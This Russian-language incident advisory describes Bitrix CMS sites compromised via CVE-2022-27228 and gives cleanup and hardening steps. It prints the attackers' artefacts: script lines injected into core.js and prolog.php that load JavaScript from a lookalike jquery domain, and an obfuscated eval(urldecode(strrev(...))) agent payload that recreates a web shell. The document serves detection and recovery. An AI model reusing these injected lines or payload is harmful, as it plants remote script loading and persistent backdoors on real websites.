Взламывают примерно с 27 июня, используя мартовскую уязвимость CVE-2022-27228.
В вашем случае почти наверняка есть шелл с запрещенным в РФ названием "site.ru/bitrix/tools/putin_h**lo.php", и в таблице b_agent его автосоздание.
В вашем случае почти наверняка есть шелл с запрещенным в РФ названием "site.ru/bitrix/tools/putin_h**lo.php", и в таблице b_agent его автосоздание.
Кто пострадал или подвержен заражению?
* Все не обновлённые версии Битрикс (с истёкшими лицензиями).* Обновлённые версии Битрикс с незакрытыми уязвимостями.
Что ломается?
* заменяется файл "index.php" в корне сайта;* удаляется файл "/bitrix/.settings.php";
* создаются задания Агента с вредоносным кодом, который заново создаёт файл "/bitrix/tools/putin_***lo.php" с кодом для удаленного доступа;
* удаляются данные из таблиц базы данных "b_iblock, b_iblock_element, b_iblock_element_property";
* в системном файле "bitrix/js/main/core/core.js" появляется лишняя строка (в конце) с кодом:
s=document.createElement(script);s.src=atob(aHR0cHM6Ly9jb2RlLmpxdWVyeS11aWkuY29tL2pxdWVyeS11aS5qcw==);document.head.appendChild(s);* в системном файле "bitrix/modules/main/include/prolog.php" в конце появляется строка:
echo "<script src='****s://**de.jquery-uii.**m/jquery-ui.js'></script>";
Восстанавливаем:
* Восстанавливаем сайт из резервной копии (backup).* Меняем административные доступы к сайту, FTP доступ, MySQL пароли.
* Проверяем и при наличии удаляем файл "/bitrix/tools/putin_***lo.php".
* На странице со списком Агентов "/bitrix/admin/agent_list.php" проверяем вызываемые функции на наличие вредоносного кода.
* удаляем лишние строки из вышеперечисленных файлов.
Пример агентов которые нужно удалить:
$arAgent["NAME"];eval(urldecode(strrev('b3%92%92%22%73%b6%34%a5%b6%76%34%26%86%a5%85%a5%73%b6%96%d4%03%43%65%b4%46%c6%74%a4%26%e4%74%a4%f6%15%d6%36%67%86%96%36%f6%e4%75%05%57%15%74%a4%07%37%97%b4%07%25%97%f4%07%d4%74%a4%f6%43%75%a5%37%a4%84%46%a7%87%45%16%b6%37%44%d4%93%b6%74%a4%f6%94%33%26%d6%47%44%45%d4%65%c6%45%07%36%d6%26%07%a4%84%46%a7%86%35%05%b6%25%97%f4%07%03%c6%94%d6%24%a7%d4%23%95%75%a5%43%d4%d6%d4%d6%65%44%f4%97%55%d6%95%c6%65%74%f4%97%15%75%e4%23%55%d6%d4%53%15%44%a5%43%d4%74%a5%a6%e4%d6%94%26%65%55%35%c4%93%03%45%44%93%64%a4%f6%55%74%a5%67%e4%75%a5%b6%93%64%e4%23%55%23%36%86%a4%75%05%a6%25%97%f4%07%14%44%b4%e6%53%75%16%03%a4%33%26%77%65%d6%36%66%a4%33%26%97%a4%85%a5%76%14%84%16%77%93%44%05%22%82%56%46%f6%36%56%46%f5%43%63%56%37%16%26%02%c2%22%07%86%07%e2%f6%c6%96%57%86%f5%e6%96%47%57%07%f2%37%c6%f6%f6%47%f2%87%96%27%47%96%26%f2%22%e2%d5%22%45%f4%f4%25%f5%45%e4%54%d4%55%34%f4%44%22%b5%25%54%65%25%54%35%f5%42%82%37%47%e6%56%47%e6%f6%36%f5%47%57%07%f5%56%c6%96%66%')));
Профилактика заражения:
* Перевести работу сайта на актуальную версию php 7.4 и выше;
* Обновить Битрикс до актуальной версии;
* Если на сайте есть модуль "Проактивная защита" ("/bitrix/admin/security_panel.php") - выполнить настройки согласно рекомендациям модуля
* Проверить сайт инструментом Битрикс "Сканер безопасности" ("/bitrix/admin/security_scanner.php")
* Закрыть доступ к файлам на уровне сервера (например в .htaccess):
-- /bitrix/tools/upload.php
-- /bitrix/tools/mail_entry.php
-- /bitrix/modules/main/include/virtual_file_system.php
-- /bitrix/components/bitrix/sender.mail.editor/ajax.php
-- /bitrix/tools/vote/uf.php
-- /bitrix/tools/html_editor_action.php
-- /bitrix/admin/site_checker.php
* Проверить и включить логирование на хостинг площадке (access, error).
